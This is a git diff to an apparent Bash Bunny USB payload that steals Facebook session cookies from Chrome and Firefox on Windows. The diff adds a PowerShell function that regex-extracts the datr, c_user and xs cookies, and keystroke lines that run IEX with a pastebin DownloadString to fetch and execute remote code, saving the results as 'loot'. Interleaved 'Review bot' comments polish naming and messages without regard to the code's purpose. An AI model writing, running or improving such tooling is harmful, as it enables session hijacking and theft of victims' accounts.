diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md
index ed037be7..8714a9b2 100644
--- a/payloads/library/WindowsCookies/README.md
+++ b/payloads/library/WindowsCookies/README.md
@@ -6,8 +6,8 @@ Credit: illwill, sekirkity, EmpireProject
 ## Description
-Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession
-Only works for Chrome on Windows. Tested on two different Windows 10 machines.
+Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession
+Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines.
 Only payload.txt is required, powershell script is here only if you want to modify it.
 ## Payload LED STATUS
diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1
index 8233e8b6..c9214787 100644
--- a/payloads/library/WindowsCookies/get_facebook_cookies.ps1
+++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1
@@ -4,7 +4,54 @@
 # Use: Get-FacebookCreds [path to Login Data]
 # Path is optional, use if automatic search doesn't work
-function Get-FacebookCreds() {
+function Get-FacebookCreds-Firefox() {
+ Param(
+ [String]$Path
+ )
+
+ if ([String]::IsNullOrEmpty($Path)) {
+ # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+ $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
+ }
+
+ if (![system.io.file]::Exists($Path))
+ {
+ Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+ Break
+ }
+
+ Add-Type -AssemblyName System.Security
+ # Credit to Matt Graber for his technique on using regular expressions to search for binary data
+ $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+ $Encoding = [system.Text.Encoding]::GetEncoding(28591)
+ $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+ $BinaryText = $StreamReader.ReadToEnd()
+ $StreamReader.Close()
+ $Stream.Close()
+
+ # First the magic bytes for the facebook string, datr size is 24
+ $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+ $datr = $PwdMatches.groups[1]
+
+ "datr is $datr"
+
+ # First the magic bytes for the facebook string, c_user size is 15
+ $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+ $c_user = $PwdMatches.groups[1]
+
+ "c_user is $c_user"
+
+ # First the magic bytes for the facebook string, xs size is 44
+ $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+ $xs = $PwdMatches.groups[1]
+
+ "xs is $xs"
+}
+
+function Get-FacebookCreds-Chrome() {
 Param(
 [String]$Path
 )
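Review bot: The error text in the new Get-FacebookCreds-Firefox is copied from the Chrome variant and still reads `'Chrome db file doesnt exist, or invalid file path specified.'`, which misdescribes the failure; a message naming the file this function actually opens would be accurate, e.g. `Write-Error 'Firefox cookies.sqlite doesnt exist, or invalid file path specified.'`. The commented-out Chrome `$Path` assignment just above it is a leftover of the same copy and can be dropped. The three `# First the magic bytes for the facebook string, ...` comments differ only in the trailing length and each begins with "First", so a per-cookie wording such as `# datr cookie: name marker followed by a 24-byte value` would read better. The name Get-FacebookCreds-Firefox carries two hyphens, which breaks PowerShell's Verb-Noun convention (the noun becomes `FacebookCreds-Firefox`); a form like Get-FirefoxFacebookCookies would be conventional, and the same applies to Get-FacebookCreds-Chrome. Get-FacebookCreds-Chrome begins in this hunk but its body continues outside it.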
@@ -61,5 +108,3 @@ function Get-FacebookCreds() {
 "xs is $DecPwd"
 }
-
-Get-FacebookCreds
\ No newline at end of file
diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt
index 0e0a7281..3a880a0b 100644
--- a/payloads/library/WindowsCookies/payload.txt
+++ b/payloads/library/WindowsCookies/payload.txt
@@ -37,7 +37,9 @@ Q ENTER
 Q DELAY 100
 #Dump Chrome Creds
-Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt
+Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Chrome \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt
+Q ENTER
+Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Firefox \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt
 Q ENTER
 Q DELAY 100
 Q STRING exit
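Review bot: The `#Dump Chrome Creds` comment now sits above both the Chrome and the Firefox STRING lines, so it no longer describes what follows it; `#Dump Chrome and Firefox session cookies` would match the two commands and the README wording. The remainder of the payload lies outside this hunk.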